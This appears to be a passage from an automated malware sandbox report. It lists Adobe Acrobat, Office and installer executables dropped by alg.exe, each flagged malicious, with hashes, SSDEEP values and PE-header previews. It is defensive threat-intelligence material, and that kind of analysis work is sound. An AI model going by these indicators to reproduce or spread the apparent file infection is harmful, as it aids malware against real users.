                                                                                                                                                SHA-512:51FACF09CA6BD6AE092AA99C688A77E62FF4D7718113139798330EED5007DBC4AEF840ED9487FE630B078AAA537E200FC0CE97AFAB36292037E249DEA3965C81
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$......C.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1515520
                                                                                                                                                Entropy (8bit):5.411788052860841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:YGqVwCto1Gm5WgfsqjnhMgeiCl7G0nehbGZpbD:lZ1GmUgDmg27RnWGj
                                                                                                                                                MD5:DB0F5E102662CEF84DC65317DC6351D2
                                                                                                                                                SHA1:B7A45F7821F1EC4AFB93CF3EDABD48A4AD68B5BC
                                                                                                                                                SHA-256:26A9AA476707B41B7B66E1DF71B2BC23552457E0DA4245E518A7E00789910E1A
                                                                                                                                                SHA-512:D5B9FED88314A54D4D0A7FC0A4A981847A87C32A73B39B6BD47F432B48687B8E662819EA7246241FDB681525C1A9A984A8A660AE09D04B23603A4E034B32CD9B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1253376
                                                                                                                                                Entropy (8bit):5.157419599560754
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:UWBWbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:UWBWbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:699B88AF04FB4B617482584C8CD550B0
                                                                                                                                                SHA1:D5EB9F8D6F083488B3BBB654228FFA90BF449307
                                                                                                                                                SHA-256:995AA05AD8373DA7B8545B66181FC7481D972E78240C1DFAD7E793F4F9B06556
                                                                                                                                                SHA-512:49E13187034BAA713655E43BC701A070E11FD4E9A5B69BE6842F7E7A1F0B2809B824BF0E59FB6DEFD6AD9542F07303E4C51646ACBCDC3D652045E09DEBFCEE0E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1683968
                                                                                                                                                Entropy (8bit):7.228507439408022
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:pf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0QsqjnhMgeiCl7G0nehbGZpbD:p+GtCi27mVTyT+a0MDmg27RnWGj
                                                                                                                                                MD5:411183BDDE745A5649A7E9B7CF2AC51F
                                                                                                                                                SHA1:D8B9B4F960F6686C127DF1BD3330BB65220A1926
                                                                                                                                                SHA-256:E07E59F649A13392CE890990C4CF85E431853CF95FBBB9593D86E51CD8171932
                                                                                                                                                SHA-512:95E0C0EDB9BEEF1B57DFCEE84C6557E0A32C9B0BD87088F7FACD7C838DFA0AE83FB825BD4AC33B5CA41AB158BF1391E623A90AC845AD391FD88D510F6214450B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................ci.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3110912
                                                                                                                                                Entropy (8bit):6.649677204951066
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:3U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYbDmg27RnWGj:o2NfHOIK5Ns6qR9BD527BWG
                                                                                                                                                MD5:2AE3E9A2E2341049034C18F64E2945E9
                                                                                                                                                SHA1:EDFB379DE972F733ACF52886379D1921FF85EB5A
                                                                                                                                                SHA-256:1A4A8E1644625C62289E671BF35ED260425462D2E4F6BB8281A7D1338AFAB4D0
                                                                                                                                                SHA-512:207B49B4E00CA340B771B07A49A1F56ABEF00D0E1DF936C4C7921846FC53702A4FB0E4CA76915AEE0BED779B2FE0516998A2BC51CE6750D779824093E589C56C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....*.0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1588224
                                                                                                                                                Entropy (8bit):5.5319372055364875
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:AkcWTUQcydvsqjnhMgeiCl7G0nehbGZpbD:AhKUUDmg27RnWGj
                                                                                                                                                MD5:6FBF39ADD7D89602D8DC7EA3216A4AB7
                                                                                                                                                SHA1:E84D546A8562AEA65F8F83DC60B990114FFEAA90
                                                                                                                                                SHA-256:D48129B9F9C3DDEE070CBB6B76340248BD2711E71470FE7553D8622CD374639C
                                                                                                                                                SHA-512:C7EC00244B25EA2B7EEDE55FDD0962BED5E8853EA7EA48C71FDA0D8F66FAA066DA2593122BB925CEEB1BB2D4AD4B36C6C03FA7FA2C14DA94CDD0B652901FD069
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1338368
                                                                                                                                                Entropy (8bit):5.352668264994154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:pfY+FUBAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pA+qBAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:EBA9125D47E7573A85ED726DA86E5C6D
                                                                                                                                                SHA1:B855CD2C298050719A7C6F6B50E50A9F0AD5C6D1
                                                                                                                                                SHA-256:BCA2935050FBE36B421B3B027839A4F5F740BBC5A80F43571835268137B0DFA1
                                                                                                                                                SHA-512:E89AD785D4677FA8EADE717EB06B71116BA5134838AEDAB9D2916C088E77BA4144B1C7542AA34874007D3A164CCDB0CCF51CB15220104146BADD46505A17ABB8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1143296
                                                                                                                                                Entropy (8bit):5.022680124667772
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:BC84410921BCD1003FC2CF0BAA6975E5
                                                                                                                                                SHA1:FCFC1A007D2543C4DF3C411D8A004F9108A1BF45
                                                                                                                                                SHA-256:211738C59AE2DFF85BC28DB2B04FBE659812A493B2C8B3D40914507D27DD47E8
                                                                                                                                                SHA-512:80513DBAFE4780175984A98A737C3F872DA3FF545EEB07BC27E41946255E67A4918C750B1FE03DFD001488EA964CA5C090FB0A4A8C219683CDC4DD3A517E3C9A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1161728
                                                                                                                                                Entropy (8bit):5.047168805090366
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:G0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:649623194B464323911FFC4ADD7C5469
                                                                                                                                                SHA1:BBB2646D3BDB331F653A7C92CED0E82F2CA727C1
                                                                                                                                                SHA-256:AB6148DBFCF97208351857F2D2B6DFB595BFB608EB4C58DDC4E8BB5E257E0AF2
                                                                                                                                                SHA-512:86A91CCD454F5B011EA221F9E5AC4BDCE446ACA9E296669AEB7E5ABD979DDCB3AC882BAF720E7225E0615A0093417AA74A9CC28B67FED3CF0FCDE73819AD7AA3
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................3.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4151808
                                                                                                                                                Entropy (8bit):6.499799704060049
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:KtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755NDmg27RN:KjEIa4HIEWOc57D527BWG
                                                                                                                                                MD5:66964FBD51DA35ACD9221038C2C983AF
                                                                                                                                                SHA1:BBC7476DC9D57A321B62AD36143C509BC9E521A8
                                                                                                                                                SHA-256:946656A18B63865E325F7698C80C61EBD4459942F28D43BE92E6596AAB6E3A80
                                                                                                                                                SHA-512:CD2366713EE97F35A6BF392224D9F68AACAB4EB7939E241DBAD3B0E294298309EE4C6BAE3C9412C79AEC3B6C3E89D9FB103F86D7BA01406D20D2BD5E8D12A2F9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59941376
                                                                                                                                                Entropy (8bit):7.999367324974561
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1572864:rQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:cXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                MD5:D07B6B95DD04008F76201663D887C465
                                                                                                                                                SHA1:A4A26D4764ACCD953E7227172840C2E3E2B36D16
                                                                                                                                                SHA-256:0C4C8C93C6BD1B1D5D9DB1E4DD1CE76208DE4A13E2AC1374D17BBC0D0CFFF381
                                                                                                                                                SHA-512:12685376A7707A336077FA1172291C03F1E447B60C27B09006F1456E3CF91F4E0619D29CE29C3247E8BD2E8C955FA78BCF74425026BDCF7F97BF47615350CF44
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......f.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1230336
                                                                                                                                                Entropy (8bit):5.185608649783263
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:7ejVWYUA0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SjkY70sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:91213D4E196AA13B125F1A861DE4745D
                                                                                                                                                SHA1:F07A05A7DA2A5AA77A95807131FDFCEBC23112C5
                                                                                                                                                SHA-256:E11DD9DE4B063B93F3E2418111D9783FEE09C8D993D3ADB4B8AC67A629769A26
                                                                                                                                                SHA-512:7AA53706A831487A8F996093DDE88FD9CA99170A70925B2AFA8F5814D909BE41638ED8B2EFA7913AE75E838A75EDAF9C5E7DD919BC7512E05C956F2EB81A864F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................Ye.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1384960
                                                                                                                                                Entropy (8bit):5.37782662458973
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:RxwSJhkrmZsYsqjnhMgeiCl7G0nehbGZpbD:Ry+krKsEDmg27RnWGj
                                                                                                                                                MD5:9E7544F54D447E26CCFA3C36B94F8E97
                                                                                                                                                SHA1:922131915BD7FAEDB0C1BD12DB95CDCB3F7D716E
                                                                                                                                                SHA-256:68CB66AC1FF8F7698FA993A3174C88F457A3302A4FBFE78EDD04EDE3531A23B1
                                                                                                                                                SHA-512:A55D109301A899B61E80B3AB4A05E9E85CA533350FED38BFB005184BC053F1289023350934242D80DBD956D3D6FE005DDD9636BB9EE5F1CD600DB1C0B00BD679
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1649152
                                                                                                                                                Entropy (8bit):5.6327482228671615
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:jHQJLIRgvsnNlsqjnhMgeiCl7G0nehbGZpbD:jHQJL34ZDmg27RnWGj
                                                                                                                                                MD5:288D9DA3A07AC18E2CFF6071869692C5
                                                                                                                                                SHA1:A9484C83016A6B83545A50BFD64F4FFC269D7EC5
                                                                                                                                                SHA-256:E70D86747FF3F5D2CD0617F37E0FAFE902E866429A8E68B2143D0F3E7E1A21C6
                                                                                                                                                SHA-512:0B582222FC50FA2FCF76A255947548B78A761762E84A912A31BE7E8074DC5A68F0CA11A65A46A2E4BCEB25DCE0055B673115ED02D8E110FEA0B587984DE1E5B5
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5365760
                                                                                                                                                Entropy (8bit):6.450979591983663
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:wUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ks:DWmXL6DEC7dRpKuDQbgiD527BWG
                                                                                                                                                MD5:84E668C37CAD335E6D98DE8ED8B8B8F2
                                                                                                                                                SHA1:190FAF0D716FB923A85939EB0B984B32731B662E
                                                                                                                                                SHA-256:DBBE8EF824E57AEE9B3FF51C7EFBD045C06E9BA492E9DBA775CBC7876A90D54C
                                                                                                                                                SHA-512:F71B460117DBE306C966F2CF56F81685C1001A31025EDFACE8FFFF7B16935F0A4045066E7DE73D3FD4C7BEA8FC1DAAA0FB9999DD5C6B9DBF95E971BDDB92107F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3163136
                                                                                                                                                Entropy (8bit):7.972781258094414
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:nrZ23AbsK6Ro022JjL2WEiVqJZtD527BWG:rJADmmxL2WEoCZtVQBWG
                                                                                                                                                MD5:23EC8F57F59E0BF3BF16E96B32E4B089
                                                                                                                                                SHA1:8F0E20ECA6C4C069A5D19602D6CE3BDA44614588
                                                                                                                                                SHA-256:580C34D9D244F2ABAC1AB0E444CA8F27D7222D6BC96F10ED1F55431DDA5BCD76
                                                                                                                                                SHA-512:DED054B0154FA2861E0A5DC67CEAC220A9FF8AC2E9873C772E6B29CB8B47A54E9AE1E0E3E52232275BFC6729E98CE1D4CD39D4248ACAA26293909580E57FE0A5
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1213440
                                                                                                                                                Entropy (8bit):7.204939327309472
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:VfrYY42wd7hlOw9fpkEE64IsqjnhMgeiCl7G0nehbGZpbD:Yz9xrS0Dmg27RnWGj
                                                                                                                                                MD5:8203AEBDB44532FD295DCD1C9FEF84CD
                                                                                                                                                SHA1:0CC5A2FA7C719CA0D518F96FA03F439910339C75
                                                                                                                                                SHA-256:6A60524D469100D9E47E07EF76F315315B75D75304F2DED340A03697FB6DF950
                                                                                                                                                SHA-512:1C2AAE09C4507E9C1ACECB54F51534A976684628EC52837F2FA0406C17D3A9CFCEFB724751445E607551528A8119F107C7AB0AD1C057AD4359D9199ACE98266D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1388544
                                                                                                                                                Entropy (8bit):5.272952041200724
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:XwkNKiZ+R2GGNUbTF5nXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:XzNKUE5nsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:48348962BAB9715BDF7BCA65A5DF8335
                                                                                                                                                SHA1:7F8A9FF72B0721176A7075D40A3B815945806CF4
                                                                                                                                                SHA-256:3B790FC0CD45FA22020534A0C931388094E6E25DAFC840892DB557B43DE46205
                                                                                                                                                SHA-512:44956B892A97BD0F6003154C393870879C791C3B6259937D1EC764091A3F2420CF810D17E187BEADD76FF6376A97C028A0E3EE46EC79D7B5CF1520D94C90253E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......a..... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
